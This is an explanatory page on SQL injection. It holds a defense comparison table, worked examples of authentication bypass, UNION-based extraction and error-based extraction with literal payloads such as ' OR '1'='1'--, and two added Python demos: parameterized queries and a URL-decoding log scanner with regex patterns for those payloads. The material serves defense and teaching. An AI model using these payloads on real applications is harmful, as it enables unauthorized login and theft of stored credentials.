Defense Comparison
| Defense | Effectiveness |
|---------|---------------|
| Parameterized queries | ✓ Highly effective — prevents all injection |
| Input blacklisting | ✗ Insufficient — attackers bypass with encoding |
| Input whitelisting | ✓ Good additional layer for specific fields |
| WAF | ✗ Insufficient alone — can be bypassed |
| Stored procedures | ✓ Effective when implemented correctly |
| Escaping | ~ Risky — easy to miss edge cases |
Examples
Example 1: Authentication Bypass
Sample vulnerable login query:
SELECT * FROM users WHERE username = '[INPUT]' AND password = '[INPUT]'
Injection payload: ' OR '1'='1'--
Resulting query:
SELECT * FROM users WHERE username = '' OR '1'='1'--' AND password = '...'
Effect: The -- comments out the rest of the query, including the password check.
'1'='1' is always true, so the WHERE clause matches every user.
The application typically takes the first row returned, so the attacker is logged in as the first user in the table (often an admin).
Other authentication bypass payloads:
' OR 1=1--
admin'--
' OR 'x'='x
') OR ('1'='1
Example 2: UNION-Based Data Extraction
Sample vulnerable product search:
SELECT name, price FROM products WHERE category = '[INPUT]'
Injection payload: ' UNION SELECT username, password FROM users--
Resulting query:
SELECT name, price FROM products WHERE category = ''
UNION SELECT username, password FROM users--'
Effect: The UNION appends rows from the users table to the product results.
The attacker sees usernames and passwords rendered in the product listing.
Finding the number of columns first:
' ORDER BY 1-- (no error = at least 1 column)
' ORDER BY 2-- (no error = at least 2 columns)
' ORDER BY 3-- (error = only 2 columns)
Then: ' UNION SELECT username, password FROM users--
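The two examples above and the "Parameterized queries" and "Input whitelisting" rows of the defense table, as an added runnable demonstration (not code from this page): the same login and product-search queries are written once with string concatenation and once with bound parameters, then fed the page's own payloads, and a sort column that cannot be bound is validated against an allow-list instead. The schema, rows and function names are constructed for the example; SQLite is used so it runs offline.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (not from any real system).
# Passwords are compared in plaintext only to mirror the page's example query;
# real applications compare a password hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'adm1n-secret'), ('bob', 'hunter2');
        CREATE TABLE products(name TEXT, price REAL, category TEXT);
        INSERT INTO products VALUES ('Widget', 9.99, 'tools'), ('Gadget', 19.99, 'tools');
        """
    )
    return conn


def login_vulnerable(conn, username, password):
    # The page's vulnerable pattern: user input concatenated into the SQL text.
    # Kept only to show that the bypass payload matches every row.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    # Bound parameters: the driver sends the input as data, so quotes, OR and --
    # inside it never become part of the query structure.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def search_vulnerable(conn, category):
    # Same concatenation flaw in the product search from Example 2.
    sql = "SELECT name, price FROM products WHERE category = '" + category + "'"
    return list(conn.execute(sql))


def search_parameterized(conn, category):
    sql = "SELECT name, price FROM products WHERE category = ?"
    return list(conn.execute(sql, (category,)))


# Identifiers (column names, table names, sort direction) cannot be bound as
# parameters, so they are validated against an allow-list before interpolation.
# This is where the table's "input whitelisting" row applies.
ALLOWED_SORT_COLUMNS = {"name", "price"}


def search_sorted(conn, category, sort_by):
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column: %r" % sort_by)
    sql = "SELECT name, price FROM products WHERE category = ? ORDER BY " + sort_by
    return list(conn.execute(sql, (category,)))


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR '1'='1'--"                                  # payload from Example 1
    union = "' UNION SELECT username, password FROM users--"  # payload from Example 2
    print("vulnerable login:", login_vulnerable(db, bypass, "anything"))
    print("parameterized login:", login_parameterized(db, bypass, "anything"))
    print("vulnerable search:", search_vulnerable(db, union))
    print("parameterized search:", search_parameterized(db, union))
    print("allow-listed sort:", search_sorted(db, "tools", "price"))
```

The concatenated versions return every user and the full users table respectively; the parameterized versions return nothing for the same inputs because the payload is compared as a literal string. The allow-list is the right tool for the ORDER BY column precisely because a placeholder cannot stand in for an identifier.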
Example 3: Error-Based Information Extraction
Payload: ' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
Effect (SQL Server): The database throws an error like:
"Conversion failed when converting the nvarchar value 'users' to data type int."
The table name 'users' is leaked through the error message when the application returns raw database errors to the client.
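The defense table marks input blacklisting insufficient because attackers bypass it with encoding; the same limitation applies to a detector that pattern-matches raw request lines. Added example (not part of this page): a small Python log scanner that URL-decodes each request path before matching the payload shapes shown in Examples 1 to 3. The access-log lines are constructed, the log layout is assumed to be common log format, and the pattern names and thresholds are this example's own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines in common log format (not from a real server).
# Lines 2, 3, 4 and 6 carry the payloads shown in Examples 1-3, URL-encoded the
# way a browser or tool would send them; lines 1 and 5 are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /login?user=bob&pass=hunter2 HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /login?user=%27%20OR%20%271%27%3D%271%27--&pass=x HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /products?category=%27+UNION+SELECT+username%2Cpassword+FROM+users-- HTTP/1.1" 200 2048
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /products?category=%27+ORDER+BY+3-- HTTP/1.1" 500 120
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=credit+union+rates HTTP/1.1" 200 900
10.0.0.6 - - [01/Jan/2024:10:00:05 +0000] "GET /items?id=1%27+AND+1%3DCONVERT(int,(SELECT+TOP+1+table_name+FROM+information_schema.tables))-- HTTP/1.1" 500 300
"""

# Payload shapes taken from the examples on this page. The names are assumptions.
PATTERNS = {
    "tautology": re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+", re.I),      # ' OR '1'='1, ' OR 1=1
    "union_select": re.compile(r"\bunion\s+select\b", re.I),             # UNION SELECT ...
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),       # ORDER BY n-- column count probe
    "comment_terminator": re.compile(r"'\s*--"),                          # quote followed by -- comment
    "convert_error": re.compile(r"\bconvert\s*\(\s*int\b", re.I),         # CONVERT(int, ...) error-based
}

# Common log format: ip ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(raw_path):
    # Decode twice so a double-encoded payload is also seen in clear. A detector
    # that matches only the raw request line never sees the quote or the keywords.
    return unquote_plus(unquote_plus(raw_path))


def scan_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = normalize(m.group("path"))
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"),
            "path": decoded, "matches": hits}


def scan_log(text):
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["matches"], finding["path"])
```

Decoding before matching is what separates this from the blacklist the table marks insufficient: the scanner inspects the same text the database would receive. The "credit union rates" line shows why the UNION pattern requires the following SELECT rather than the bare keyword. This is an alerting aid for a SOC, not a control; the control remains the parameterized query, and the companion mitigation for Example 3 is to log the database error server-side and return a generic message to the client.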